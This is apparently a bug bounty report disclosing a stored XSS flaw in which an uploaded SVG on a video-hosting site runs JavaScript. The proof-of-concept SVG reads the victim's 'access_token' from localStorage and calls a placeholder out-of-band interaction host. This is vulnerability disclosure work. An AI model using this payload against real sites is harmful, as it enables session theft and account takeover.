✍️ Description

We can upload a SVG image and then send the url of that to other users and when they open the link we can get their complete session keys as the session keys stored in local storage and with Javascript easily can be stolen by attackers.

🕵️‍♂️ Proof of Concept

1.Go to https://interact.projectdiscovery.io/ and receive a url and replace it with xxxxxxxxxxxxxxxxxxx.xxxxxxxxxx in image.SVG.

2.upload image.SVG file somewhere on website like NEW CHANNEL section and copy the link of SVG image after upload that already should be like this: blob:https://tube.s1gm4.eu/3d2c5059-114f-4664-a7f6-0f9a96f480c6

3.Open the URL and you can see the user main access key( just for test I show one of the main local storage keys) and also you can see that in https://interact.projectdiscovery.io/ we receive some ping from tube.s1gm4.eu.

//image.SVG

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
   xmlns:svg="http://www.w3.org/2000/svg"
   xmlns="http://www.w3.org/2000/svg"
   xmlns:xlink="http://www.w3.org/1999/xlink"
   style="overflow: hidden; position: relative;"
   width="300"
   height="200">

  <image
     x="10"
     y="10"
     width="276"
     height="110"
     xlink:href="http://images.google.com/intl/es_ALL/images/logos/images_logo_lg.gif"
     stroke-width="1"
     id="image3204" />
  <rect
     x="0"
     y="150"
     height="10"
     width="300"
     style="fill: black"/>

<script type="text/javascript">
   const token = localStorage.getItem('access_token')
   alert(token);
   async function getUserInfo() {
     const response = await fetch('https://xxxxxxxxxxxxxxxxxxx.xxxxxxxxxx')
   }
   getUserInfo();
</script>
</svg>

💥 Impact

This vulnerability is capable of take control of user accounts.